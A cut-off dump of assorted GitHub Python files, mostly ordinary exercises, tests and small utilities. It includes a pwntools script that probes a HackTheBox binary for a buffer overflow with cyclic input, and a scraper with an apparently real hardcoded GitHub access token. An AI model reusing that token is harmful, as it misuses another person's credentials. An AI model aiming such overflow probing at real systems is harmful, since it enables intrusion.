[int(i) for i in Ysplit]\n\npESCA = 0\npVet = list()\n\nfor i in range(3):\n pESCA += X[i]*Y[i]\n\npVet.append(X[1]*Y[2] - X[2]*Y[1])\npVet.append(X[0]*Y[2] - X[2]*Y[0])\npVet.append(X[0]*Y[1] - X[1]*Y[0])\n\nprint(\"O produto ESCALAR é: %i\" %pESCA)\nprint(\"Vetor do produto VETORIAL: %s \"%pVet)\n\n","repo_name":"TheMarcelin/Python","sub_path":"Q7.4.py","file_name":"Q7.4.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74317297449","text":"# coding=utf8\n\n\"\"\"\nThis file contains tests for the FPF class and its methods\n\"\"\"\n\n\n__author__ = \"Thibault Hilaire, Benoit Lopez\"\n__copyright__ = \"Copyright 2015, FIPOgen Project, LIP6\"\n__credits__ = [\"Thibault Hilaire\", \"Benoit Lopez\"]\n\n__license__ = \"CECILL-C\"\n__version__ = \"0.4\"\n__maintainer__ = \"Thibault Hilaire\"\n__email__ = \"thibault.hilaire@lip6.fr\"\n__status__ = \"Beta\"\n\nimport pytest\nfrom fixif.FxP import FPF\nfrom random import randint, choice\nfrom pytest import mark\nfrom tempfile import NamedTemporaryFile, mkdtemp\nfrom subprocess import Popen, PIPE\n\n\n\ndef test_construct():\n\t\"\"\"Unit test for the FPF constructor\"\"\"\n\t# construct FPF with less than 2 args\n\twith pytest.raises(ValueError):\n\t\tFPF(16)\n\twith pytest.raises(ValueError):\n\t\tFPF(msb=12)\n\twith pytest.raises(ValueError):\n\t\tFPF(lsb=-6)\n\n\t# construct with wrong wl\n\twith pytest.raises(ValueError):\n\t\tFPF(wl=-12, msb=6)\n\twith pytest.raises(ValueError):\n\t\tFPF(wl=1, msb=6, signed=True)\n\n\n\t# construct FPF with only wl and (lsb or msb)\n\tf = FPF(16, lsb=-12)\n\tassert(f.wml() == (16, 3, -12))\n\tf = FPF(16, msb=3)\n\tassert(f.wml() == (16, 3, -12))\n\tf = FPF(16, msb=0)\n\tassert(f.wml() == (16, 0, -15))\n\twith pytest.raises(ValueError):\n\t\tFPF(16, 12, -5)\n\t\n\t# construct form string\n\tf = FPF(formatStr=\"Q8.12\")\n\tassert(f.wml() == (20, 7, -12))\n\tf = FPF(formatStr=\"sQ4.3\")\n\tassert(f.wml() == (7, 3, -3))\n\tf = FPF(formatStr=\"uQ4.3\")\n\tassert(f.wml() == (7, 3, -3))\n\tf = FPF(formatStr=\"(8,-12)\")\n\tassert(f.wml() == (21, 8, -12))\n\tf = FPF(formatStr=\"u(8,-12)\")\n\tassert(f.signed is False)\n\tassert(f.wml() == (21, 8, -12))\n\twith pytest.raises(ValueError):\n\t\tFPF(formatStr=\"totoQ6.8\")\n\t\t\n\tf = FPF(msb=7, lsb=0, signed=True)\n\tassert(f.minmax() == (-128, 127))\n\tf = FPF(msb=7, lsb=0, signed=False)\n\tassert(f.minmax() == (0, 255))\n\n\n# def test_shift():\n# \t\"\"\" Test the shifts\n# \t\"\"\"\n# \t# TODO: complete the tests\n# \tf = FPF(16, 3, -12)\n# \tf.shift(2)\n# \tassert(f.wml() == (16, 5, -10))\n\n\n\n\n# def test_approx():\n# \t\"\"\"Test the approx method\"\"\"\n# \t# TODO: do it over a large number of values\n# \tF = FPF(msb=7, lsb=0)\n# \tassert(F.approx(25) == 25)\n# \tassert(F.approx(25.001) == 25)\n# \tassert(F.approx(25.26789) == 25)\n\n\ndef iterSomeFPF(N):\n\tfor _ in range(N):\n\t\tw = randint(2,30)\n\t\tm = randint(-30,30)\n\t\ts = choice([True,False])\n\t\tyield FPF(wl=w, msb=m, signed=s)\n\n\n@mark.parametrize(\"fpf\", iterSomeFPF(100))\ndef test_LaTeX(fpf):\n\t\"\"\"Test the LaTeX (tikz) code for a FPF\"\"\"\n\t# randomly choose the parameter (do not want to exploit all the possibilities)\n\ty_origin = randint(-5,5)\n\tcolors = choice([None, ('red!40','blue!30','green!40'), ('black!60', 'black!30', 'white')])\n\tbinary_point = choice([True, False])\n\tlabel = choice( ['left', 'right', 'above', 'below', 'no'])\n\tnotation = choice([\"mlsb\", \"ifwl\"])\n\tnumeric = choice([True, False])\n\tintfrac = choice([True, False])\n\tpower2 = choice([True, False])\n\tdrawMissing = choice([True, False])\n\t# go to a temp directory\n\ttmp = mkdtemp()\n\t# create a temp file\n\twith NamedTemporaryFile(mode='w+', dir=tmp) as f:\n\t\t# write minimal LaTeX code in it\n\t\tlatex = fpf.LaTeX(y_origin=y_origin, colors=colors, binary_point=binary_point, label=label, notation=notation, numeric=numeric, intfrac=intfrac, power2=power2, drawMissing=drawMissing)\n\t\tf.write(\"\"\"\n\\\\documentclass[class=minimal,border=0mm]{standalone}\n\\\\usepackage{tikz}\n\\\\usetikzlibrary{backgrounds}\n\\\\usetikzlibrary{patterns}\n\\\\begin{document}\n\\\\begin{tikzpicture}[show background rectangle, background rectangle/.style={fill=white}]\n\t\\\\tikzstyle{fractional}=[fill=red!40]\n\t\\\\tikzstyle{integer}=[fill=blue!15]\n\t\\\\tikzstyle{sign}=[fill=purple!15]\n%s\n\\\\end{tikzpicture}\n\\\\end{document}\"\"\"%latex)\n\t\tf.flush()\n\t\t# run pdflatex on it\n\t\tproc = Popen( \"cd \" + tmp + \"&& pdflatex \"+ f.name, stdout=PIPE, stderr=PIPE, shell=True)\n\t\t# check if the output doesn't start with a '!' (a way to detect LaTeX error in the output of pdflatex)\n\t\tline='non-empty'\n\t\twhile line:\n\t\t\tline = proc.stdout.readline().decode('utf-8')\n\t\t\tassert(not line.startswith('!'))\n\n\t\t#TODO: do it with latex package (as it is done in fixif itself, see fixif.SIF.R_algorithm)\n\n\n\n@mark.parametrize(\"fpf\", iterSomeFPF(1000))\ndef test_notation(fpf):\n\tassert(FPF(formatStr=fpf.Qnotation()) == fpf)\n\tassert(FPF(formatStr=fpf.ParenthesisNotation()) == fpf)\n\tassert(FPF(formatStr=repr(fpf)) == fpf)\n\tstr(fpf)","repo_name":"fixif/FxP","sub_path":"fixif/FxP/test/test_FPF.py","file_name":"test_FPF.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14742976678","text":"\"\"\"\npublic: Podem ser acessados dentro e fora da classe\nprotected: Apenas dentro da classe ou dentro das filhas\nprivate: Só fica disponível dentro da classe\n\n# Convensão do Python: Se um atributo possui um underline antes do nome, não é recomendado acessar ele.\n_ é igual a protected/private: Mesmo utilizando dessa forma ainda é possível acessar e fazer alterações na variável. (public _)\n__ é extramamente recomendado que não seja acessado essa variável (_NOMECLASSE__nomeatributo).\n\nServe para proteger a sua aplicação.\nExemplo:\n\"\"\"\n\n\nclass BaseDeDados:\n def __init__(self):\n self.__dados = {} # recomenda-se utilizar dois underlines para que a variável não seja acessada.\n\n def inserir_cliente(self, id, nome):\n if 'clientes' not in self.__dados:\n self.__dados['clientes'] = {id: nome}\n else:\n self.__dados['clientes'].update({id: nome})\n\n def lista_clientes(self):\n for id, nome in self.__dados['clientes'].items():\n print(id, nome)\n\n def apaga_cliente(self, id):\n del self.__dados['clientes'][id]\n\n\nbd = BaseDeDados()\nbd.inserir_cliente(1, 'Elias')\nbd.inserir_cliente(2, 'Otavio')\nbd.inserir_cliente(3, 'Rose')\n\nbd.__dados = 'Uma outra coisa' # Quando você acessa a variavel dessa forma o Python cria outra e não altera a da classe.\n# Para ver o atributo alterado:\nprint(bd.__dados)\nprint(bd._BaseDeDados__dados)\n\n","repo_name":"eliasantoniorodrigues1/POO_python","sub_path":"encapsulamento.py","file_name":"encapsulamento.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23201708624","text":"if __name__ == '__main__':\n n = int(input())\n l = []\n for _ in range(n):\n s = input().split()\n if(s[0]=='insert'):\n a = int(s[1])\n b = int(s[2])\n l.insert(a, b)\n elif(s[0]=='print'):\n print(l)\n elif(s[0]=='remove'):\n a = int(s[1])\n l.remove(a)\n elif(s[0]=='append'):\n a = int(s[1])\n l.append(a)\n elif(s[0]=='sort'):\n l.sort()\n elif(s[0]=='pop'):\n l.pop()\n elif(s[0]=='reverse'):\n l.reverse()\n\n\"\"\"\nEditorial by DOSHI\nWe can solve this using list methods and conditionals.\n\nTested by DOSHI\nProblem Tester's code:\n\narr = []\nfor i in range(int(raw_input())):\n s = raw_input().split()\n for i in range(1,len(s)):\n s[i] = int(s[i])\n \n if s[0] == \"append\":\n arr.append(s[1])\n elif s[0] == \"extend\": \n arr.extend(s[1:])\n elif s[0] == \"insert\":\n arr.insert(s[1],s[2])\n elif s[0] == \"remove\":\n arr.remove(s[1])\n elif s[0] == \"pop\":\n arr.pop()\n elif s[0] == \"index\":\n print arr.index(s[1])\n elif s[0] == \"count\":\n print arr.count(s[1])\n elif s[0] == \"sort\":\n arr.sort()\n elif s[0] == \"reverse\":\n arr.reverse()\n elif s[0] == \"print\":\n print arr\n\"\"\"\n","repo_name":"laziestcoder/Python_HR_Codes","sub_path":"2 Basic Data Types/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"7014157449","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"logger\",\n version=\"0.0.1\",\n author=\"TFreitaz\",\n author_email=\"thales.zfreitas@gmail.com\",\n description=\"Easy creation and upload of full detailed logs.\",\n long_description=long_description,\n url=\"https://github.com/arocketman/git-and-pip\",\n packages=setuptools.find_packages(),\n install_requires=[\"cryptography==3.2.1\", \"elasticsearch==7.10.1\", \"python-dotenv==0.15.0\"],\n classifiers=[\"Programming Language :: Python :: 3\", \"Operating System :: OS Independent\"],\n)\n","repo_name":"TFreitaz/logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12635816328","text":"from django.test import TestCase\nfrom .models import Picture,Comment,HashTag,Profile\nimport datetime as dt\n\n# Create your tests here.\nclass PictureTestClass(TestCase):\n def setUp(self):\n self.picture =Picture(title='image',caption='image description',published='11/2/2022',user=self.user)\n self.picture.save_picture()\n\n self.comment =Comment(published='11/2/2022',content='image description',user=self.user)\n\n self.profile =Profile(user='image',bio='image description')\n self.picture.save_picture()\n\n self.hashtag =HashTag(name='image')\n self.picture.save_picture()\n\n def tearDown(self):\n Picture.objects.all().delete()\n Profile.objects.all().delete()\n Comment.objects.all().delete()\n HashTag.objects.all().delete()\n \n def test_get_ipicture_id(self):\n picture=Picture.get_picture_by_id()\n self.assertTrue(len(picture)>0)\n\n def test_search_picture(self):\n term='school'\n results=Picture.search_picture(term)\n self.assertTrue(len(results)==0)","repo_name":"tori-bot/instagram-clone","sub_path":"insta_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"916998065","text":"\"\"\"\n--- Day 21: Springdroid Adventure ---\n\nhttps://adventofcode.com/2019/day/21\n\n\"\"\"\n\nimport re\n\nfrom _intcode_computer import IntcodeComputer\n\nTILE2DRAW = {\n 0: '#',\n 1: '.',\n 2: '~',\n -1: ' ',\n}\n\n\nclass NoSignal(Exception):\n pass\n\n\nclass IntcodeComputer21(IntcodeComputer):\n def _get_op3_input(self):\n if self.signals:\n return self.signals.pop(0)\n # return input('Enter instruction:\\n')\n self.gen = self._compute()\n raise NoSignal()\n\n\nclass SpringScript:\n _jump_size = 4\n _rexp = re.compile(r'(\\w+)\\s+(\\w)\\s(\\w)')\n\n def __init__(self, to_draw=False, extended_mode=False):\n self.to_draw = to_draw\n # Two registers are available: T, the temporary value register, and J, the jump register\n\n # Your springdroid can detect ground at four distances:\n # one tile away (A), two tiles away (B), three tiles away (C), and four tiles away (D).\n # If there is ground at the given distance, the register will be true; if there is a hole,\n # the register will be false\n self.registers = {\n 'T': False, # temporary value register\n 'J': False, # jump register\n 'A': False, # is there ground 1 tile away\n 'B': False, # is there ground 2 tiles away\n 'C': False, # is there ground 3 tiles away\n 'D': False, # is there ground 4 tiles away\n 'E': False,\n 'F': False,\n 'G': False,\n 'H': False,\n 'I': False,\n }\n\n self.computer = IntcodeComputer21()\n\n self.extended_mode = extended_mode\n\n @staticmethod\n def _check_is_writable(y):\n return y in ('T', 'J')\n\n def _and(self, x, y):\n self._check_is_writable(y)\n\n val = self.registers[x] and self.registers[y]\n self.registers[y] = val\n return val\n\n def _or(self, x, y):\n self._check_is_writable(y)\n\n val = self.registers[x] or self.registers[y]\n self.registers[y] = val\n return val\n\n def _not(self, x, y):\n self._check_is_writable(y)\n\n val = not self.registers[x]\n self.registers[y] = val\n return val\n\n @staticmethod\n def _get_string_in_ascii(s):\n return [ord(c) for c in s] + [10]\n\n def _test(self, program, test_map):\n for idx, reg in enumerate(\n ['A', 'B', 'C', 'D'] if not self.extended_mode\n else ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']\n ):\n v = test_map[idx]\n self.registers[reg] = v\n\n for line in program:\n if line in ('WALK', 'RUN'):\n break\n res = self._rexp.match(line)\n if not res:\n raise ValueError(line)\n instr, x, y = res.groups()\n method = {\n 'AND': self._and,\n 'OR': self._or,\n 'NOT': self._not,\n }[instr]\n _reg = dict(self.registers)\n print(_reg)\n\n method(x, y)\n\n print(f'{instr} {x} {y}')\n print('{}'.format({k: v for k, v in self.registers.items() if v != _reg[k]}))\n\n res = False\n if self.registers['J']:\n print('jump!')\n res = True\n\n print()\n return res\n\n def _get_walk_program(self):\n \"\"\"\n There are only three instructions available in springscript:\n\n AND X Y sets Y to true if both X and Y are true; otherwise, it sets Y to false.\n OR X Y sets Y to true if at least one of X or Y is true; otherwise, it sets Y to false.\n NOT X Y sets Y to true if X is false; otherwise, it sets Y to false.\n\n Returns:\n list of int: ASCII code\n\n \"\"\"\n # _jump_if_ground4 = '''\n # OR {} J # jump if ground in 4 steps\n # _jump_if_ground4 = 'OR E J'\n _jump_if_ground4 = '''\n OR D J\n {}\n '''.format(\n '' if not self.extended_mode\n else '''\n OR H T\n OR E T\n AND T J\n '''\n )\n\n _but_dont_jump_if_no_hole = '''\n NOT A T # 1 if need jump\n NOT T T # 0 if need jump\n AND B T # 0 if need jump\n AND C T # 0 if need jump (one of three tiles has hole)\n {}\n NOT T T # 1 if need jump\n AND T J\n '''.format(\n # '\\n'.join(('AND {} T'.format(s) for s in 'DEF')) if self.extended_mode\n '' if self.extended_mode\n else ''\n )\n\n do = 'RUN' if self.extended_mode else 'WALK'\n _program = f'''\n {_jump_if_ground4}\n \n {_but_dont_jump_if_no_hole}\n \n {do}\n '''\n program = []\n for _line in _program.split('\\n'):\n line = _line.strip()\n if not line:\n continue\n if line.startswith('#'):\n continue\n comment_idx = line.find('#')\n if comment_idx > -1:\n line = line[:comment_idx]\n if not line:\n continue\n\n for idx, symbol in enumerate(reversed(line)):\n if symbol.isalpha():\n break\n\n line = line[:-idx]\n\n program.append(line)\n\n if self.extended_mode:\n # self._test(program, [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, ])\n\n # bad = '#####..#@########'\n # bad = '#####...#########'\n # bad = '#####..#.########'\n # bad = '#####.#.#...#.###'\n bad = '##.#.#...#.###'\n map = [{'#': 1}.get(x, 0) for x in bad]\n assert not self._test(program, map)\n\n bad = '##...#########'\n map = [{'#': 1}.get(x, 0) for x in bad]\n assert not self._test(program, map)\n else:\n self._test(program, [1, 1, 1, 1, 1, 0, 1])\n\n codes = []\n for instruction in program:\n codes.extend(self._get_string_in_ascii(instruction))\n\n return codes\n\n def get_amout_of_hull_damage(self):\n try:\n for out in self.computer.gen:\n print(f'{chr(out)}', end='')\n except NoSignal:\n # now enter the program\n for instruction_code in self._get_walk_program():\n print(f'{chr(instruction_code)}', end='')\n self.computer.feed(instruction_code)\n\n try:\n for out in self.computer.gen:\n print(f'{chr(out)}', end='')\n except ValueError:\n return out\n\n\ndef part1(*args, **kwargs):\n return SpringScript(*args, **kwargs).get_amout_of_hull_damage()\n\n\ndef part2(*args, **kwargs):\n return SpringScript(extended_mode=True).get_amout_of_hull_damage()\n\n\nif __name__ == '__main__':\n for res in (\n part1(),\n part2(),\n ):\n print(res)\n","repo_name":"nerewarin/adventofcode2019","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27463655852","text":"import yt_dlp as youtube_dl\r\n\r\n# URL of the video\r\nurl = input(\"Enter the video URL: \")\r\n\r\n# Set options for yt_dlp to fetch available formats\r\nydl_opts = {\r\n 'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best',\r\n}\r\n\r\n# Fetch available formats for the video\r\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n info_dict = ydl.extract_info(url, download=False)\r\n formats = info_dict.get('formats', [])\r\n\r\n# Create a dictionary to store unique video quality options\r\nunique_qualities = {}\r\n\r\n# Identify unique video quality options and store them in the dictionary\r\nfor format_info in formats:\r\n if format_info['vcodec'] != 'none':\r\n resolution = format_info['resolution'] if 'resolution' in format_info else 'Unknown'\r\n format_note = format_info.get('format_note', 'Unknown')\r\n unique_qualities[resolution] = format_note\r\n\r\n# Display the unique video quality options\r\nprint(\"Available video quality options:\")\r\nfor i, (resolution, format_note) in enumerate(unique_qualities.items(), start=1):\r\n print(f\"{i}. {resolution} - {format_note}\")\r\n\r\n# Ask the user to choose the desired video quality by entering the option number\r\nwhile True:\r\n try:\r\n choice = int(input(\"Enter the number of the desired video quality: \"))\r\n if 1 <= choice <= len(unique_qualities):\r\n selected_quality = list(unique_qualities.keys())[choice - 1]\r\n break\r\n else:\r\n print(\"Invalid choice. Please enter a valid option number.\")\r\n except ValueError:\r\n print(\"Invalid input. Please enter a valid option number.\")\r\n\r\n# Filter the video formats based on the selected quality\r\nselected_formats = [format_info for format_info in formats if format_info['resolution'] == selected_quality]\r\n\r\nif not selected_formats:\r\n print(\"No video format available in the selected quality.\")\r\nelse:\r\n # Download one video from the selected quality\r\n ydl_opts['format'] = selected_formats[0]['format_id']\r\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n ydl.download([url])\r\n\r\n print(f\"The requested video has been downloaded.\")\r\n","repo_name":"gurungsuresh13/YouTube-Video-Downloader","sub_path":"youtube_video_downloader.py","file_name":"youtube_video_downloader.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41854077121","text":"import spotipy\nimport requests\n\nspotify_client = spotify_client\nspotify_secret = spotify_secret\nspotify = spotipy.oauth2.SpotifyOAuth(scope=\"playlist-modify-private\", client_id=spotify_client, client_secret=spotify_secret, redirect_uri=\"https://example.com\", cache_path=\"token.txt\")\n\nsp = spotipy.client.Spotify(auth_manager=spotify)\ntrack = sp.search(\"track:Sanctuary artist:Joji\", limit=1, type=\"track\")\nprint(track[\"tracks\"][\"items\"][0][\"external_urls\"][\"spotify\"])\n\n# requests.post(\"https://api.spotify.com/v1/users/989ucp29eddsikxpnaxflcxhr/playlists\")","repo_name":"fnilvuwu/100-days-of-code-python","sub_path":"spotify-playlist/tes_spotify.py","file_name":"tes_spotify.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73540486888","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filebrowser.fields\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('events', '0002_auto_20150416_2301'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventProgramation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=100, verbose_name='Nome')),\n ('image', filebrowser.fields.FileBrowseField(\n help_text='Para n\\xe3o distorcer, envie uma imagem com resolu\\xe7\\xe3o m\\xe1xima de 200x200px.',\n max_length=200, null=True, verbose_name='Imagem', blank=True)),\n ('date_time', models.DateTimeField(verbose_name='Data e Hora')),\n ('active', models.CharField(default=b'S', max_length=1, verbose_name='Exibir',\n choices=[(b'Y', 'Sim'), (b'N', 'N\\xe3o')])),\n ('description',\n ckeditor.fields.RichTextField(max_length=1000, verbose_name='Descri\\xe7\\xe3o', blank=True)),\n ],\n options={\n 'ordering': ['-name', '-description'],\n 'db_table': 'event_programation',\n 'verbose_name': 'Programa\\xe7\\xe3o',\n 'verbose_name_plural': 'Programa\\xe7\\xf5es',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"roberzguerra/scout","sub_path":"events/migrations/0003_eventprogramation.py","file_name":"0003_eventprogramation.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74365114406","text":"import os\r\nimport time\r\nimport re\r\nfrom slackclient import SlackClient\r\n\r\n# instantiate Slack client\r\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\r\n# starterbot's user ID in Slack: value is assigned after the bot starts up\r\nstarterbot_id = None\r\n\r\n# constants\r\nRTM_READ_DELAY = 1 # 1 second delay between reading from RTM\r\nEXAMPLE_COMMAND = \"!themify\"\r\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\r\n\r\ngenre_counter = {\r\n \"fantasy\": 0,\r\n \"horror\": 0,\r\n \"adventure\": 0,\r\n \"sci-fi\": 0,\r\n \"mystery\": 6,\r\n \"action\": 0,\r\n \"crime\": 0,\r\n \"romance\": 0,\r\n \"comedy\": 0,\r\n \"thriller\": 0,\r\n \"drama\": 0\r\n}\r\n\r\ngenre_colors = {\r\n \"horror\": [0xAC813D, 0xAC813D,0x6F6F6F, 0xFFFFFF, 0x6F6F6F, 0xFFFFFF, 0x6F6F6F, 0x6F6F6F],\r\n \"adventure\": [0x705116, 0x379114,0x1b480a, 0xFFFFFF, 0x1b480a, 0xFFFFFF, 0x1b480a, 0x1b480a],\r\n \"comedy\": [0xe6e600,0x999999,0x999999,0x000000,0x4da6ff,0x000000,0xb3b3b3,0xb3b3b3],\r\n \"fantasy\": [0x379114, 0xAC813D,0x1b480a, 0xFFFFFF, 0x1b480a, 0xFFFFFF, 0x1b480a, 0x1b480a],\r\n \"drama\": [0x8000ff,0x4d0099,0xFF4DC4,0xffffff,0x4d0099,0xFFFFFF,0x00FFB7,0xFF4DC4],\r\n \"sci-fi\": [0x1a1aff,0xe60000,0x7300e6,0xFFFFFF,0xb30000,0xFFFFFF,0xff1a1a,0xff1a1a],\r\n \"mystery\": [0x4D5250,0x444A47,0xD39B46,0xFFFFFF,0x434745,0xFFFFFF,0x99D04A,0xDB6668],\r\n \"crime\": [0xcc6600,0x994d00,0x994d00,0xFFFFFF,0xb36b00,0xFFFFFF,0x994d00,0x994d00],\r\n \"action\": [0xff0000,0x1a1aff,0x000099,0xFFFFFF,0x1a1aff,0xFFFFFF,0x1a1aff,0x9999ff],\r\n \"thriller\": [0x101010, 0x101010, 0x5df322, 0xFFFFFF, 0x5df322, 0xFFFFFF, 0x5df322, 0x5df322],\r\n \"romance\": [0xFF847C,0xBB76E7,0xbb76e7,0xFFFFFF,0xbb76e7,0xFFFFFF,0xbb76e7,0xbb76e7],\r\n \"default\": [0xF8F8FA,0xF8F8FA,0x2D9EE0,0xFFFFFF,0xFFFFFF,0x383F45,0x60D156,0xDC5960]\r\n}\r\n\r\n\r\ndef find_dominant_genre():\r\n maxVal = 0\r\n diff = 0\r\n cur_genre = ''\r\n for key in genre_counter:\r\n if genre_counter[key] - maxVal > diff:\r\n diff = genre_counter[key] - maxVal\r\n maxVal = genre_counter[key]\r\n cur_genre = key\r\n return (diff, cur_genre)\r\n\r\n #(genre_1, val_1), (genre_2, val_2) = sorted(d.items(), key=lambda x: x[1], reverse=True)[:2]\r\n\r\ndef find_cur_hex_code():\r\n diff, cur_genre = find_dominant_genre()\r\n if not cur_genre:\r\n return genre_colors[\"default\"]\r\n ans = []\r\n print(diff, cur_genre)\r\n for i in range(8):\r\n default_val = (10-diff)* int(genre_colors[\"default\"][i])\r\n genre_val = diff * int(genre_colors[cur_genre][i])\r\n print(genre_colors[\"default\"][i], genre_colors[cur_genre][i])\r\n print(default_val, genre_val)\r\n ans.append(hex(int((default_val + genre_val)/10)))\r\n #return [hex((10-diff)/10 * genre_colors[\"default\"][i] + diff/10 * genre_colors[cur_genre][i]) for i in range(8)]\r\n return ans\r\n\r\ndef hex_code_as_string():\r\n hex_code = find_cur_hex_code()\r\n ans = \"\"\r\n for i in range(7):\r\n ans += '#' + str(hex_code[i])[2:] + ', '\r\n ans += '#' + str(hex_code[7])[2:]\r\n return ans\r\n\r\ndef parse_bot_commands(slack_events):\r\n \"\"\"\r\n Parses a list of events coming from the Slack RTM API to find bot commands.\r\n If a bot command is found, this function returns a tuple of command and channel.\r\n If its not found, then this function returns None, None.\r\n \"\"\"\r\n for event in slack_events:\r\n if event[\"type\"] == \"message\" and not \"subtype\" in event and event[\"channel\"] == \"GCUAGSGTU\":\r\n print(event[\"text\"])\r\n user_id, message = parse_direct_mention(event[\"text\"])\r\n if user_id == starterbot_id:\r\n return message, event[\"channel\"]\r\n return None, None\r\n\r\ndef parse_direct_mention(message_text):\r\n \"\"\"\r\n Finds a direct mention (a mention that is at the beginning) in message text\r\n and returns the user ID which was mentioned. If there is no direct mention, returns None\r\n \"\"\"\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)\r\n\r\ndef handle_command(command, channel):\r\n \"\"\"\r\n Executes bot command if the command is known\r\n \"\"\"\r\n # Default response is help text for the user\r\n default_response = \"Not sure what you mean. Try *{}*.\".format(EXAMPLE_COMMAND)\r\n\r\n # Finds and executes the given command, filling in response\r\n response = None\r\n # This is where you start to implement more commands!\r\n if command.startswith(EXAMPLE_COMMAND):\r\n response = hex_code_as_string()\r\n\r\n # Sends the response back to the channel\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=channel,\r\n text=response or default_response\r\n )\r\n\r\nif __name__ == \"__main__\":\r\n if slack_client.rtm_connect(with_team_state=False):\r\n print(\"Genrelize Bot connected and running!\")\r\n # Read bot's user ID by calling Web API method `auth.test`\r\n starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\r\n while True:\r\n command, channel = parse_bot_commands(slack_client.rtm_read())\r\n if command:\r\n handle_command(command, channel)\r\n time.sleep(RTM_READ_DELAY)\r\n else:\r\n print(\"Connection failed. Exception traceback printed above.\")\r\n","repo_name":"YamenAlmasalmeh/HackRice_Genrelize","sub_path":"genrelize.py","file_name":"genrelize.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39890366399","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\n\ndef start():\n \n file_name = './bad_grades'\n\n if len(sys.argv) > 1:\n if sys.argv[1] == 'gdb':\n gdbscript = 'continue'\n return gdb.debug(file_name, gdbscript=gdbscript)\n else:\n host, port = sys.argv[2:]\n return remote(host, port)\n return process(file_name)\n\n\ndef main():\n \n\n length = int(sys.argv[1])\n\n print (2)\n print(length)\n for i in cyclic(length).decode():\n print(i)\n \n sys.exit()\n\n io = start()\n\n io.sendlineafter('>', '2')\n # io.recvline()\n io.sendline('50')\n # io.sendlineafter(':', '50')\n \n payload = cyclic(50)\n\n for i in range(50):\n io.sendlineafter(':', payload[i])\n\n io.interactive()\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"psanjay679/htb","sub_path":"pwn/bad_grades/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6378306112","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 4 08:49:57 2017\n\n@author: jean-marcsevin\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'https://gist.github.com/paulmillr/2657075'\n\ndef get_soup(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n return soup\n\ndef get_repos(user):\n r = requests.get('https://api.github.com/users/' + user + '/repos', {'type': 'owner'}, auth = ('jmsevin', '7a48e19ed3b70887e57a25694e3e42b916a70244'))\n return r.json()\n\ndef calc_stars_mean(repos):\n sm = pd.Series([repo['stargazers_count'] for repo in repos]).mean()\n return sm\n\ndef get_user_stars_mean(user):\n usm = calc_stars_mean(get_repos(user))\n return usm\n \nsoup = get_soup(url)\n\nrows = soup.find('tbody').find_all('tr')\nusers = [row.find('a').text for row in rows]\nstars = [calc_stars_mean(get_repos(user)) for user in users]\n\nclassement = pd.DataFrame({'Utilisateur': users, 'Moyenne': stars})\nclassement = classement[['Utilisateur', 'Moyenne']].sort_values('Moyenne', ascending = 